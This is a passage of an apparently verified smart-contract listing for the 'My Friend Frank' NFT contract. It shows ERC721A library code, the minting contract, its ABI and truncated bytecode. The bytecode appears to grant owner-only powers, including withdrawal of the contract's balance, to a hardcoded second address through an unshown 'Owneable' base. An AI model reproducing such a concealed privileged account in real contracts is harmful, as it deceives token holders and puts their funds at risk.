     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract MyFriendFRANK is ERC721A, Owneable {

    string public baseURI = "ipfs://";
    string public contractURI = "ipfs://Qmdiz7GyZPzDQCgiqTTVyEQ6vtpxbpZy9E6rGH7BUSQjMd";
    string public baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public MAX_PER_TX_FREE = 5;
    uint256 public FREE_MAX_SUPPLY = 1111;
    uint256 public constant MAX_PER_TX = 10;
    uint256 public MAX_SUPPLY = 3333;
    uint256 public price = 0.0009 ether;

    bool public paused = true;

    constructor() ERC721A("My Friend Frank", "FRANKENSTEIN") {}

    function mint(uint256 _amount) external payable {
        //Feature to be added 2 Franks combined = something amazing.
        address _caller = _msgSender();
        require(!paused, "Paused");
        require(MAX_SUPPLY >= totalSupply() + _amount, "Zapped To Life Has Been Robbed");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "Frank says  No Contracts");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(FREE_MAX_SUPPLY >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }




  

    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
       
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function Fear() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function Reserve(uint256 quantity) external onlyOwner {
        _safeMint(_msgSender(), quantity);
    }


    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function configPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }


     function configMAX_PER_TX_FREE(uint256 newFREE) public onlyOwner {
        MAX_PER_TX_FREE = newFREE;
    }

    function configmax_supply(uint256 newSupply) public onlyOwner {
        MAX_SUPPLY = newSupply;
    }

    function configfree_max_supply(uint256 newFreesupply) public onlyOwner {
        FREE_MAX_SUPPLY = newFreesupply;
    }
    function newbaseExtension(string memory newex) public onlyOwner {
        baseExtension = newex;
    }


//Future Use
        function Roam(uint256[] memory tokenids) external onlyOwner {
        uint256 len = tokenids.length;
        for (uint256 i; i < len; i++) {
            uint256 tokenid = tokenids[i];
            _burn(tokenid);
        }
    }
    //Will require 2 Franks to create a unique FREE mint character.


    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"FREE_MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"Fear","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"Reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"tokenids","type":"uint256[]"}],"name":"Roam","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFREE","type":"uint256"}],"name":"configMAX_PER_TX_FREE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"configPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFreesupply","type":"uint256"}],"name":"configfree_max_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"configmax_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newex","type":"string"}],"name":"newbaseExtension","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735bb656bb4312f100081abb7b08c1e0f8ef5c56d1600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600781526020017f697066733a2f2f00000000000000000000000000000000000000000000000000815250600a9080519060200190620000a69291906200031b565b5060405180606001604052806035815260200162004e8f60359139600b9080519060200190620000d89291906200031b565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600c9080519060200190620001269291906200031b565b506005600d55610457600e55610d05600f556603328b944c40006010556001601160006101000a81548160ff0219169083151502179055503480156200016b57600080fd5b506040518060400160405280600f81526020017f4d7920467269656e64204672616e6b00000000000000000000000000000000008152506040518060400160405280600c81526020017f4652414e4b454e535445494e00000000000000000000000000000000000000008152508160029080519060200190620001f09291906200031b565b508060039080519060200190620002099291906200031b565b506200021a6200024860201b60201c565b600081905550505062000242620002366200024d60201b60201c565b6200025560201b60201c565b62000430565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200032990620003cb565b90600052602060002090601f0160209004810192826200034d576000855562000399565b82601f106200036857805160ff191683800117855562000399565b8280016001018555821562000399579182015b82811115620003985782518255916020019190600101906200037b565b5b509050620003a89190620003ac565b5090565b5b80821115620003c7576000816000905550600101620003ad565b5090565b60006002820490506001821680620003e457607f821691505b60208210811415620003fb57620003fa62000401565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b614a4f80620004406000396000f3fe6080604052600436106102305760003560e01c8063715018a61161012e578063c6682862116100ab578063db7b64a81161006f578063db7b64a8146107f2578063e8a3d4851461081b578063e985e9c514610846578063f2fde38b14610883578063f43a22dc146108ac57610230565b8063c66828621461070d578063c87b56dd14610738578063cd7c032614610775578063d476de1b146107a0578063db4a0f61146107c957610230565b8063a035b1fe116100f2578063a035b1fe1461065d578063a0712d6814610688578063a22cb465146106a4578063b698cb96146106cd578063b88d4fde146106e457610230565b8063715018a61461059c5780638069876d146105b35780638da5cb5b146105de578063938e3d7b1461060957806395d89b411461063257610230565b806332cb6b0c116101bc57806355f804b31161018057806355f804b3146104a35780635c975abb146104cc5780636352211e146104f75780636c0360eb1461053457806370a082311461055f57610230565b806332cb6b0c146103d2578063393f18fb146103fd57806342842e0e14610426578063463fff791461044f5780635312e5cf1461047a57610230565b8063095ea7b311610203578063095ea7b31461030357806318160ddd1461032c57806318e223dd1461035757806323b872dd146103805780632aa80807146103a957610230565b806301ffc9a71461023557806302329a291461027257806306fdde031461029b578063081812fc146102c6575b600080fd5b34801561024157600080fd5b5061025c60048036038101906102579190613c80565b6108d7565b604051610269919061411d565b60405180910390f35b34801561027e57600080fd5b5061029960048036038101906102949190613c53565b6109b9565b005b3480156102a757600080fd5b506102b0610ab1565b6040516102bd9190614138565b60405180910390f35b3480156102d257600080fd5b506102ed60048036038101906102e89190613d50565b610b43565b6040516102fa91906140b6565b60405180910390f35b34801561030f57600080fd5b5061032a60048036038101906103259190613bca565b610bbf565b005b34801561033857600080fd5b50610341610cca565b60405161034e91906142ba565b60405180910390f35b34801561036357600080fd5b5061037e60048036038101906103799190613d50565b610ce1565b005b34801561038c57600080fd5b506103a760048036038101906103a29190613ab4565b610dc6565b005b3480156103b557600080fd5b506103d060048036038101906103cb9190613d07565b610dd6565b005b3480156103de57600080fd5b506103e7610ecb565b6040516103f491906142ba565b60405180910390f35b34801561040957600080fd5b50610424600480360381019061041f9190613c0a565b610ed1565b005b34801561043257600080fd5b5061044d60048036038101906104489190613ab4565b610ffe565b005b34801561045b57600080fd5b5061046461101e565b60405161047191906142ba565b60405180910390f35b34801561048657600080fd5b506104a1600480360381019061049c9190613d50565b611024565b005b3480156104af57600080fd5b506104ca60048036038101906104c59190613d07565b611109565b005b3480156104d857600080fd5b506104e16111fe565b6040516104ee919061411d565b60405180910390f35b34801561050357600080fd5b5061051e60048036038101906105199190613d50565b611211565b60405161052b91906140b6565b60405180910390f35b34801561054057600080fd5b50610549611227565b6040516105569190614138565b60405180910390f35b34801561056b57600080fd5b5061058660048036038101906105819190613a47565b6112b5565b60405161059391906142ba565b60405180910390f35b3480156105a857600080fd5b506105b1611385565b005b3480156105bf57600080fd5b506105c861140d565b6040516105d591906142ba565b60405180910390f35b3480156105ea57600080fd5b506105f3611413565b60405161060091906140b6565b60405180910390f35b34801561061557600080fd5b50610630600480360381019061062b9190613d07565b61143d565b005b34801561063e57600080fd5b50610647611532565b6040516106549190614138565b60405180910390f35b34801561066957600080fd5b506106726115c4565b60405161067f91906142ba565b60405180910390f35b6106a2600480360381019061069d9190613d50565b6115ca565b005b3480156106b057600080fd5b506106cb60048036038101906106c69190613b8a565b61186e565b005b3480156106d957600080fd5b506106e26119e6565b005b3480156106f057600080fd5b5061070b60048036038101906107069190613b07565b611b7d565b005b34801561071957600080fd5b50610722611bf9565b60405161072f9190614138565b60405180910390f35b34801561074457600080fd5b5061075f600480360381019061075a9190613d50565b611c87565b60405161076c9190614138565b60405180910390f35b34801561078157600080fd5b5061078a611d32565b60405161079791906140b6565b60405180910390f35b3480156107ac57600080fd5b506107c760048036038101906107c29190613d50565b611d4a565b005b3480156107d557600080fd5b506107f060048036038101906107eb9190613d50565b611e2f565b005b3480156107fe57600080fd5b5061081960048036038101906108149190613d50565b611f14565b005b34801561082757600080fd5b50610830612003565b60405161083d9190614138565b60405180910390f35b34801561085257600080fd5b5061086d60048036038101906108689190613a74565b612091565b60405161087a919061411d565b60405180910390f35b34801561088f57600080fd5b506108aa60048036038101906108a59190613a47565b612185565b005b3480156108b857600080fd5b506108c161227d565b6040516108ce91906142ba565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806109a257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109b257506109b182612282565b5b9050919050565b6109c16122ec565b73ffffffffffffffffffffffffffffffffffffffff166109df611413565b73ffffffffffffffffffffffffffffffffffffffff161480610a555750610a046122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b9061425a565b60405180910390fd5b80601160006101000a81548160ff02191690831515021790555050565b606060028054610ac0906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610aec906145c8565b8015610b395780601f10610b0e57610100808354040283529160200191610b39565b820191906000526020600020905b815481529060010190602001808311610b1c57829003601f168201915b5050505050905090565b6000610b4e826122f4565b610b84576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610bca82611211565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c32576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c516122ec565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c835750610c8181610c7c6122ec565b612091565b155b15610cba576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610cc5838383612342565b505050565b6000610cd46123f4565b6001546000540303905090565b610ce96122ec565b73ffffffffffffffffffffffffffffffffffffffff16610d07611413565b73ffffffffffffffffffffffffffffffffffffffff161480610d7d5750610d2c6122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610dbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db39061425a565b60405180910390fd5b80600f8190555050565b610dd18383836123f9565b505050565b610dde6122ec565b73ffffffffffffffffffffffffffffffffffffffff16610dfc611413565b73ffffffffffffffffffffffffffffffffffffffff161480610e725750610e216122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610eb1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea89061425a565b60405180910390fd5b80600c9080519060200190610ec7929190613765565b5050565b600f5481565b610ed96122ec565b73ffffffffffffffffffffffffffffffffffffffff16610ef7611413565b73ffffffffffffffffffffffffffffffffffffffff161480610f6d5750610f1c6122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610fac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa39061425a565b60405180910390fd5b60008151905060005b81811015610ff9576000838281518110610fd257610fd1614732565b5b60200260200101519050610fe5816128ea565b508080610ff19061462b565b915050610fb5565b505050565b61101983838360405180602001604052806000815250611b7d565b505050565b600d5481565b61102c6122ec565b73ffffffffffffffffffffffffffffffffffffffff1661104a611413565b73ffffffffffffffffffffffffffffffffffffffff1614806110c0575061106f6122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f69061425a565b60405180910390fd5b80600d8190555050565b6111116122ec565b73ffffffffffffffffffffffffffffffffffffffff1661112f611413565b73ffffffffffffffffffffffffffffffffffffffff1614806111a557506111546122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6111e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111db9061425a565b60405180910390fd5b80600a90805190602001906111fa929190613765565b5050565b601160009054906101000a900460ff1681565b600061121c82612c8e565b600001519050919050565b600a8054611234906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054611260906145c8565b80156112ad5780601f10611282576101008083540402835291602001916112ad565b820191906000526020600020905b81548152906001019060200180831161129057829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561131d576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b61138d6122ec565b73ffffffffffffffffffffffffffffffffffffffff166113ab611413565b73ffffffffffffffffffffffffffffffffffffffff1614611401576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f89061425a565b60405180910390fd5b61140b6000612f1d565b565b600e5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6114456122ec565b73ffffffffffffffffffffffffffffffffffffffff16611463611413565b73ffffffffffffffffffffffffffffffffffffffff1614806114d957506114886122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611518576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150f9061425a565b60405180910390fd5b80600b908051906020019061152e929190613765565b5050565b606060038054611541906145c8565b80601f016020809104026020016040519081016040528092919081815260200182805461156d906145c8565b80156115ba5780601f1061158f576101008083540402835291602001916115ba565b820191906000526020600020905b81548152906001019060200180831161159d57829003601f168201915b5050505050905090565b60105481565b60006115d46122ec565b9050601160009054906101000a900460ff1615611626576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161d9061415a565b60405180910390fd5b8161162f610cca565b61163991906143eb565b600f54101561167d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611674906141fa565b60405180910390fd5b600082116116c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116b79061419a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff161461172e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117259061423a565b60405180910390fd5b81600a1015611772576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611769906141ba565b60405180910390fd5b61177a610cca565b600e54106117cc5781600d5410156117c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117be906141da565b60405180910390fd5b611860565b81600a1015611810576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611807906141ba565b60405180910390fd5b346010548361181f9190614472565b1461185f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118569061427a565b60405180910390fd5b5b61186a8183612fe3565b5050565b6118766122ec565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156118db576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600760006118e86122ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166119956122ec565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516119da919061411d565b60405180910390a35050565b6119ee6122ec565b73ffffffffffffffffffffffffffffffffffffffff16611a0c611413565b73ffffffffffffffffffffffffffffffffffffffff161480611a825750611a316122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ac1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab89061425a565b60405180910390fd5b60004790506000611ad06122ec565b73ffffffffffffffffffffffffffffffffffffffff1682604051611af3906140a1565b60006040518083038185875af1925050503d8060008114611b30576040519150601f19603f3d011682016040523d82523d6000602084013e611b35565b606091505b5050905080611b79576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b709061429a565b60405180910390fd5b5050565b611b888484846123f9565b611ba78373ffffffffffffffffffffffffffffffffffffffff16613001565b8015611bbc5750611bba84848484613024565b155b15611bf3576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b50505050565b600c8054611c06906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054611c32906145c8565b8015611c7f5780601f10611c5457610100808354040283529160200191611c7f565b820191906000526020600020905b815481529060010190602001808311611c6257829003601f168201915b505050505081565b6060611c92826122f4565b611cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cc89061421a565b60405180910390fd5b6000600a8054611ce0906145c8565b905011611cfc5760405180602001604052806000815250611d2b565b600a611d0783613184565b600c604051602001611d1b93929190614070565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b611d526122ec565b73ffffffffffffffffffffffffffffffffffffffff16611d70611413565b73ffffffffffffffffffffffffffff